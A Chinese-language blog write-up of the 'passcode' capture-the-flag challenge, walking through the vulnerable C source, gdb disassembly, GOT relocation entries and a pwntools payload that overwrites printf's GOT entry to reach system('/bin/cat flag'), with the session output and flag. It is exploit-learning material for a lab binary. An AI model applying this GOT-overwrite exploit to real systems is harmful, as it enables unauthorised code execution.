PWN学习之[Toddler''s Bottle]-[passcode]

打开passcode.c，可以看到源码如下：

#include <stdio.h>#include <stdlib.h>void login(){    int passcode1;    int passcode2;    printf("enter passcode1 : ");    scanf("%d", passcode1);    fflush(stdin);    // ha! mommy told me that 32bit is vulnerable to bruteforcing :)    printf("enter passcode2 : ");        scanf("%d", passcode2);    printf("checking...\n");    if(passcode1==338150 && passcode2==13371337){                printf("Login OK!\n");                system("/bin/cat flag");        }        else{                printf("Login Failed!\n");        exit(0);        }}void welcome(){    char name[100];    printf("enter you name : ");    scanf("%100s", name);    printf("Welcome %s!\n", name);}int main(){    printf("Toddler's Secure Login System 1.0 beta.\n");    welcome();    login();    // something after login...    printf("Now I can safely trust you that you have credential :)\n");    return 0;   }

观察login()函数，可以看到在输入passcode1和passcode2时，由于scanf的变量没有使用&，执行scanf函数时，会将passcode当作地址执行。

使用gdb调试程序，奇怪的事情出现了，发现login和welcome函数的ebp相同。
经过计算发现，name(ebp-0x70)与passcode1(ebp-0x10)只相差96，而输入name时，scanf的长度限制为100，所以我们可以通过name来更改passcode1的值。

因此，我们可以利用got表复写技术，将printf,scanf等在程序中调用的函数在got表中的值改掉，这样程序调用函数时，通过got表就会进行到更改后的地址。

我们先通过objdump -R passcode 查看一下程序中函数在got中的地址。

passcode:     file format elf32-i386DYNAMIC RELOCATION RECORDSOFFSET   TYPE              VALUE 08049ff0 R_386_GLOB_DAT    __gmon_start__0804a02c R_386_COPY        stdin@@GLIBC_2.00804a000 R_386_JUMP_SLOT   printf@GLIBC_2.00804a004 R_386_JUMP_SLOT   fflush@GLIBC_2.00804a008 R_386_JUMP_SLOT   __stack_chk_fail@GLIBC_2.40804a00c R_386_JUMP_SLOT   puts@GLIBC_2.00804a010 R_386_JUMP_SLOT   system@GLIBC_2.00804a014 R_386_JUMP_SLOT   __gmon_start__0804a018 R_386_JUMP_SLOT   exit@GLIBC_2.00804a01c R_386_JUMP_SLOT   __libc_start_main@GLIBC_2.00804a020 R_386_JUMP_SLOT   __isoc99_scanf@GLIBC_2.7

看一下login函数

(gdb) disas loginDump of assembler code for function login:   0x08048564 <+0>: push   %ebp   0x08048565 <+1>: mov    %esp,%ebp   0x08048567 <+3>: sub    $0x28,%esp   0x0804856a <+6>: mov    $0x8048770,%eax   0x0804856f <+11>:    mov    %eax,(%esp)   0x08048572 <+14>:    call   0x8048420 <printf@plt>   0x08048577 <+19>:    mov    $0x8048783,%eax   0x0804857c <+24>:    mov    -0x10(%ebp),%edx   0x0804857f <+27>:    mov    %edx,0x4(%esp)   0x08048583 <+31>:    mov    %eax,(%esp)   0x08048586 <+34>:    call   0x80484a0 <__isoc99_scanf@plt>   0x0804858b <+39>:    mov    0x804a02c,%eax   0x08048590 <+44>:    mov    %eax,(%esp)   0x08048593 <+47>:    call   0x8048430 <fflush@plt>   0x08048598 <+52>:    mov    $0x8048786,%eax   0x0804859d <+57>:    mov    %eax,(%esp)   0x080485a0 <+60>:    call   0x8048420 <printf@plt>   0x080485a5 <+65>:    mov    $0x8048783,%eax   0x080485aa <+70>:    mov    -0xc(%ebp),%edx   0x080485ad <+73>:    mov    %edx,0x4(%esp)   0x080485b1 <+77>:    mov    %eax,(%esp)   0x080485b4 <+80>:    call   0x80484a0 <__isoc99_scanf@plt>   0x080485b9 <+85>:    movl   $0x8048799,(%esp)   0x080485c0 <+92>:    call   0x8048450 <puts@plt>   0x080485c5 <+97>:    cmpl   $0x528e6,-0x10(%ebp)   0x080485cc <+104>:   jne    0x80485f1 <login+141>   0x080485ce <+106>:   cmpl   $0xcc07c9,-0xc(%ebp)   0x080485d5 <+113>:   jne    0x80485f1 <login+141>   0x080485d7 <+115>:   movl   $0x80487a5,(%esp)   0x080485de <+122>:   call   0x8048450 <puts@plt>   0x080485e3 <+127>:   movl   $0x80487af,(%esp)  //我们将要跳转的地方既got表修改后的值   0x080485ea <+134>:   call   0x8048460 <system@plt>   0x080485ef <+139>:   leave     0x080485f0 <+140>:   ret       0x080485f1 <+141>:   movl   $0x80487bd,(%esp)   0x080485f8 <+148>:   call   0x8048450 <puts@plt>   0x080485fd <+153>:   movl   $0x0,(%esp)---Type <return> to continue, or q <return> to quit---   0x08048604 <+160>:   call   0x8048480 <exit@plt>End of assembler dump.

我们选用printf函数，因此我们的payload即为
payload=’a’*96//填充name首地址与passcode1的空间
+0x804a000//更改passcode 为printf的地址
+134514147 //0x80485e3既system(“/bin/cat flag”) 因为scanf函数输入的是%d，所以采用十进制

>>> from pwn import *>>> p=0x804a000>>> s=0x80485e3>>> paylode='a'*96+p32(p)+str(s)>>> e=process("./passcode")[x] Starting local process './passcode'[+] Starting local process './passcode': Done>>> e.sendline(paylode)>>> e.recvline()[*] Process './passcode' stopped with exit code 0"Toddler's Secure Login System 1.0 beta.\n">>> e.recvline()'enter you name : Welcome aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!\n'>>> e.recvline()'Sorry mom.. I got confused about scanf usage :(\n'>>> 

得到如上Sorry mom ..的flag

欢迎访问本人原博客查看更多文章 Magician.